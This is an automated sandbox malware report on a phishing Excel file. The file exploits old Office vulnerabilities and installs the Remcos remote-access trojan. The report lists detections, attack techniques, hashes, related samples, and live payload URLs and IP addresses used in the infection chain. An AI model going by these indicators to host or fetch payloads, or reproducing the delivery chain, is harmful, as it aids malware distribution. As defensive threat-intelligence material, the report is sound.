Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	322 Process Injection	1 Bypass User Account Control	LSA Secrets	34 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	2 Security Software Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Virtualization/Sandbox Evasion	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	322 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Swift tract-20240506_120.xls	18%	ReversingLabs	Document-Excel.Exploit.CVE-2017-0199
Swift tract-20240506_120.xls	26%	Virustotal		Browse
Swift tract-20240506_120.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AB6DAD69-2E1E-438B-868F-672C91416C1F}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc	100%	Avira	HEUR/Rtf.Malformed
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc	100%	Avira	HEUR/Rtf.Malformed

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
woi.gg	12%	Virustotal		Browse
geoplugin.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://geoplugin.net/json.gp	0%	URL Reputation	safe
http://geoplugin.net/json.gp/C	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://geoplugin.net/json.gpoj	0%	Avira URL Cloud	safe
216.9.224.18	0%	Avira URL Cloud	safe
http://91.92.254.194/imge/new-image_v.jpgSEG;	0%	Avira URL Cloud	safe
http://91.92.254.194/imge/new-image_v.jpg	100%	Avira URL Cloud	malware
http://172.232.56.138/99032/goodflowersandgoodreturn.gifC:	0%	Avira URL Cloud	safe
http://91.92.254.194/imge/new-image_v.jpg	1%	Virustotal		Browse
http://woi.gg/1RxrR6	0%	Avira URL Cloud	safe
http://172.232.56.138/99032/goodflowersandgoodreturn.gif	0%	Avira URL Cloud	safe
http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt-)	0%	Avira URL Cloud	safe
http://91.92.254.194	0%	Avira URL Cloud	safe
216.9.224.18	18%	Virustotal		Browse
http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt	0%	Avira URL Cloud	safe
http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc	0%	Avira URL Cloud	safe
https://woi.gg/1RxrR6	0%	Avira URL Cloud	safe
http://172.232.56.138/99032/goodflowersandgoodreturn.gif	9%	Virustotal		Browse
http://woi.gg/1RxrR6	10%	Virustotal		Browse
http://172.232.56.138/99032/WRESXL	0%	Avira URL Cloud	safe
http://91.92.254.194	4%	Virustotal		Browse
http://geoplugin.net/json.gpxj	0%	Avira URL Cloud	safe
http://91.92.254.194/imge/new-im	0%	Avira URL Cloud	safe
http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc	7%	Virustotal		Browse
http://172.232.56.138/99032/WRESS.txt	0%	Avira URL Cloud	safe
http://172.232.58	0%	Avira URL Cloud	safe
http://91.92.254.194/imge/new	0%	Avira URL Cloud	safe
https://woi.gg/1RxrR6	10%	Virustotal		Browse
http://woi.gg/1RxrR6yX	0%	Avira URL Cloud	safe
http://172.232.56.138/99032/WRESS.txt	9%	Virustotal		Browse
http://172.232.56.138/99032/goodflowersandgoodreturn.gifj	0%	Avira URL Cloud	safe
http://172.232.56.138	0%	Avira URL Cloud	safe
http://91.92.254.14/Users_API/syscore/file_uB	0%	Avira URL Cloud	safe
http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt	21%	Virustotal		Browse
http://woi.gg/	0%	Avira URL Cloud	safe
http://172.232.56.138	4%	Virustotal		Browse
http://woi.gg/	12%	Virustotal		Browse
http://91.92.254.194/imge/new-im	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
woi.gg	104.21.11.106	true	true	12%, Virustotal, Browse	unknown
geoplugin.net	178.237.33.50	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
216.9.224.18	true	18%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.254.194/imge/new-image_v.jpg	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown
http://woi.gg/1RxrR6	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://172.232.56.138/99032/goodflowersandgoodreturn.gif	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://woi.gg/1RxrR6	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://172.232.56.138/99032/WRESS.txt	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gpoj	RegAsm.exe, 0000000B.00000002.1043182519.0000000000715000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.254.194/imge/new-image_v.jpgSEG;	powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453644812.0000000000350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.0000000002531000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://172.232.56.138/99032/goodflowersandgoodreturn.gifC:	EQNEDT32.EXE, 00000006.00000002.438034337.00000000005D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt-)	wscript.exe, 00000008.00000002.456456551.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456052828.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456251442.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456214083.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456242695.00000000008B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.92.254.194	powershell.exe, 00000009.00000002.454900677.00000000063A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp/C	powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt	wscript.exe, 00000008.00000002.456398436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.456421617.000000000087F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456226459.000000000087D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456202348.000000000088C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456338283.000000000089F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456149772.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456236059.000000000088E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456317690.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.456251442.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, goodflowersandgoodreturn[1].gif.6.dr, goodflowersandgoodreturn.vBS.6.dr	false	21%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://172.232.56.138/99032/WRESXL	powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpxj	RegAsm.exe, 0000000B.00000002.1043182519.0000000000715000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.92.254.194/imge/new-im	powershell.exe, 00000009.00000002.454900677.00000000063A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454900677.0000000006398000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://172.232.58	powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.453918209.0000000002531000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.92.254.194/imge/new	powershell.exe, 00000009.00000002.453615609.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453627782.0000000000310000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.000000000266C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453644812.0000000000350000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.453918209.0000000002531000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://woi.gg/1RxrR6yX	56630000.0.dr, ~DFE0FBB2FDB2FD1126.TMP.0.dr	true	Avira URL Cloud: safe	unknown
http://172.232.56.138/99032/goodflowersandgoodreturn.gifj	EQNEDT32.EXE, 00000006.00000002.438034337.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.232.56.138	powershell.exe, 00000009.00000002.454900677.0000000006499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.454900677.0000000006211000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.254.14/Users_API/syscore/file_uB	wscript.exe, 00000008.00000002.456398436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://woi.gg/	woi.gg.url.4.dr	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
216.9.224.18	unknown	Reserved	7018	ATT-INTERNET4US	true
104.21.11.106	woi.gg	United States	13335	CLOUDFLARENETUS	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
91.92.254.14	unknown	Bulgaria	34368	THEZONEBG	true
91.92.254.194	unknown	Bulgaria	34368	THEZONEBG	true
172.232.56.138	unknown	United States	20940	AKAMAI-ASN1EU	true
172.67.148.197	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467963
Start date and time:	2024-07-05 07:15:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Swift tract-20240506_120.xls
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLS@9/34@7/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 76 Number of non-executed functions: 192
Cookbook Comments:	Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Active ActiveX Object Scroll down Close Viewer Override analysis time to 54646.1843580397 for current running targets taking high CPU consumption Override analysis time to 109292.368716079 for current running targets taking high CPU consumption Override analysis time to 218584.737432159 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:16:39	API Interceptor	24x Sleep call for process: EQNEDT32.EXE modified
01:16:40	API Interceptor	70x Sleep call for process: wscript.exe modified
01:16:42	API Interceptor	28x Sleep call for process: powershell.exe modified
01:16:49	API Interceptor	12796429x Sleep call for process: RegAsm.exe modified

LLM Input / Output

Input

Output

URL: Office document Model: gpt-4o

```json{  "riskscore": 9,  "reasons": "The screenshot contains a visually prominent message stating 'This document is protected' alongside a Microsoft Office logo, which is a well-known brand. This can mislead users into believing the document is legitimate. The text creates a sense of urgency or necessity to access the document by implying it is protected and requires action to view it. This is a common tactic used in phishing attacks to prompt users to click on a link or button that may lead to a phishing page or malware download."}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
216.9.224.18	xxh1GZYmD2.rtf	Get hash	malicious	Unknown	Browse	216.9.224.18/2999/pillowgoodandcleanimg.png
	DHL AWB# 7954365.xls	Get hash	malicious	Unknown	Browse	216.9.224.18/2999/pillowgoodandcleanimg.png
	SBM_C3350i240229122.xls	Get hash	malicious	Remcos, DBatLoader	Browse	216.9.224.18/9045/flowersaregoodforimagescreate.bmp
	SKM_C3350i2402291223.xls	Get hash	malicious	Remcos	Browse	216.9.224.18/4050/MBV.txt
104.21.11.106	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/1v6uTh
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Remcos	Browse	woi.gg/1v6uTh
	20240506_12082.xls	Get hash	malicious	Unknown	Browse	woi.gg/UMSw6a
	Techno_PO LV12406-003211.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/OVrcv0
	Techno_PO LV12406-003211.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/OVrcv0
	PO LV12406-00390.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/OVrcv0
	PO LV12406-00390.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/OVrcv0
	Techno_PO LV12406-001.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/VRhFkZ
	Techno_PO LV12406-001.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/Yf8Rrj
	Techno_PO LV12406-001.xla.xlsx	Get hash	malicious	Unknown	Browse	woi.gg/VRhFkZ
178.237.33.50	PAYMENT - STATEMENT ADVISE.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	Aviso de Pago __Banco Republica.pdf.bat.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PAYMENT COPY 04.07.24.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	Payment- Statement Advise.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	DHL AWB 6533732999.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Quotation.xls	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Payment Advice__Swift-MT103.pdf.bat.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
woi.gg	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.148.197
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Remcos	Browse	104.21.11.106
	20240506_12082.xls	Get hash	malicious	Unknown	Browse	104.21.11.106
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Remcos	Browse	172.67.148.197
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.148.197
	Techno_PO LV12406-003211.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106
	Techno_PO LV12406-003211.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.148.197
	Techno_PO LV12406-003211.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106
	PO LV12406-00390.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106
geoplugin.net	PAYMENT - STATEMENT ADVISE.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	Aviso de Pago __Banco Republica.pdf.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PAYMENT COPY 04.07.24.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	Payment- Statement Advise.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL AWB 6533732999.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	Payment Advice__Swift-MT103.pdf.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	Nuevo orden.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	91.92.254.194
	odeme tarihleri.scr.exe	Get hash	malicious	XenoRAT	Browse	91.92.248.167
	fechas de pago.scr.exe	Get hash	malicious	XenoRAT	Browse	91.92.248.167
	fechas de pago.scr.exe	Get hash	malicious	XenoRAT	Browse	91.92.248.167
	fechas de pago.scr.exe	Get hash	malicious	XenoRAT	Browse	91.92.248.167
	fechas de pago.scr.exe	Get hash	malicious	XenoRAT	Browse	91.92.248.167
	odeme tarihleri.scr.exe	Get hash	malicious	XenoRAT	Browse	91.92.248.167
	Pod0SuHrkb.rtf	Get hash	malicious	Unknown	Browse	91.92.254.29
	Orden.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	91.92.254.132
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	91.92.254.29
CLOUDFLARENETUS	IMG 003.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	msupdate.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	msupdate.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	pirates.bat	Get hash	malicious	Kematian Stealer	Browse	104.16.124.96
	pirates.bat	Get hash	malicious	Kematian Stealer	Browse	104.16.123.96
	c2e57fb2b8206bd9b5d05d8a9b0d2e78082dd303ee6364b288d568fcd48900f7_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	6xmBUtHylU.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	XX(1).exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	OVER DUE INVOICE PAYMENT.docx	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AW0S.sdscondo.com/index.xml%23?email=cGV0ZXIuYnJvd24yM0Bxci5jb20uYXU=	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
ATOM86-ASATOM86NL	PAYMENT - STATEMENT ADVISE.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	Aviso de Pago __Banco Republica.pdf.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PAYMENT COPY 04.07.24.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	Payment- Statement Advise.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	1QP92XNATU.elf	Get hash	malicious	Unknown	Browse	95.142.101.193
	PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL AWB 6533732999.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	BDQfYL99b2.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
ATT-INTERNET4US	https://rules-pear-kft5d2.mystrikingly.com/	Get hash	malicious	Unknown	Browse	13.32.27.122
	https://seismic.com/products/aura-copilot/	Get hash	malicious	Unknown	Browse	13.32.27.94
	j980HN1yJw.elf	Get hash	malicious	Unknown	Browse	13.135.25.178
	vCh0ttyibb.elf	Get hash	malicious	Unknown	Browse	12.137.136.253
	205.185.124.50-arm-2024-07-03T23_47_53.elf	Get hash	malicious	Mirai, Moobot	Browse	13.166.115.6
	205.185.124.50-x86-2024-07-03T23_47_55.elf	Get hash	malicious	Mirai, Moobot	Browse	108.253.52.172
	CMgd5ZVG2N.elf	Get hash	malicious	Unknown	Browse	98.98.43.225
	qS7rA9kvqg.elf	Get hash	malicious	Unknown	Browse	99.59.167.153
	1eMpWRaDQE.elf	Get hash	malicious	Unknown	Browse	12.148.47.69
	PMcyGpR57k.elf	Get hash	malicious	Unknown	Browse	67.118.104.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	OVER DUE INVOICE PAYMENT.docx	Get hash	malicious	Snake Keylogger	Browse	172.67.148.197
	OVER DUE INVOICE PAYMENT.docx.doc	Get hash	malicious	Snake Keylogger	Browse	172.67.148.197
	swift_copy.docx.doc	Get hash	malicious	Unknown	Browse	172.67.148.197
	Pod0SuHrkb.rtf	Get hash	malicious	Unknown	Browse	172.67.148.197
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.148.197
	DHL Invoice 20240407.xls	Get hash	malicious	FormBook	Browse	172.67.148.197
	bodtfUNu8p.rtf	Get hash	malicious	Unknown	Browse	172.67.148.197
	Payment receipt_1.docx.doc	Get hash	malicious	Lokibot	Browse	172.67.148.197
	Ship particulars.xls	Get hash	malicious	Unknown	Browse	172.67.148.197
	Inquiry HA-22-28199 22-Q22024.doc	Get hash	malicious	FormBook	Browse	172.67.148.197
7dcce5b76c8b17472d024758970a406b	OVER DUE INVOICE PAYMENT.docx	Get hash	malicious	Snake Keylogger	Browse	104.21.11.106 172.67.148.197
	OVER DUE INVOICE PAYMENT.docx.doc	Get hash	malicious	Snake Keylogger	Browse	104.21.11.106 172.67.148.197
	swift_copy.docx.doc	Get hash	malicious	Unknown	Browse	104.21.11.106 172.67.148.197
	Payment receipt_1.docx.doc	Get hash	malicious	Lokibot	Browse	104.21.11.106 172.67.148.197
	Payment_Advice.xls	Get hash	malicious	Unknown	Browse	104.21.11.106 172.67.148.197
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.30916.4690.rtf	Get hash	malicious	Unknown	Browse	104.21.11.106 172.67.148.197
	statement .xls	Get hash	malicious	Unknown	Browse	104.21.11.106 172.67.148.197
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106 172.67.148.197
	Bank Slip 2.doc	Get hash	malicious	Snake Keylogger	Browse	104.21.11.106 172.67.148.197
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106 172.67.148.197

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	3.5312175673313835
Encrypted:	false
SSDEEP:	6:6lVmh+b5YcIeeDAlDVYwSySNombQDyw9cu/ulPUO9SNos9gQeWAv:6lVs+DecxiwhykvfCt9ugZW+
MD5:	AE28B3E61AD40A7DF799B804EA72B092
SHA1:	4DF2B64B0BF18A453A0077BAE2A01E3548B9EF71
SHA-256:	FB6725E1932443C94806B94B993534B97511AD8261E3C251B4E976DB24CD6EFC
SHA-512:	F510F05A177E53E86CFF9C6908C93536E6C594FDC4176BA4A0DA3EE305D01CD10846391AE598DEC1C293D2FA0E36B3EE666D34478E2E6007765BE62D66F297ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\not\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.4./.0.7./.0.5. .0.1.:.1.6.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.1.R.x.r.R.6. .[.R.e.a.d.-.O.n.l.y.]. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .S.w.i.f.t. .t.r.a.c.t.-.2.0.2.4.0.5.0.6._.1.2.0. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].........[.M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02546787018124073
Encrypted:	false
SSDEEP:	6:I3DPcSHFnx3FvxggLRw2Aw/rRXv//4tfnRujlw//+GtluJ/eRuj:I3DPp33p8C/tvYg3J/
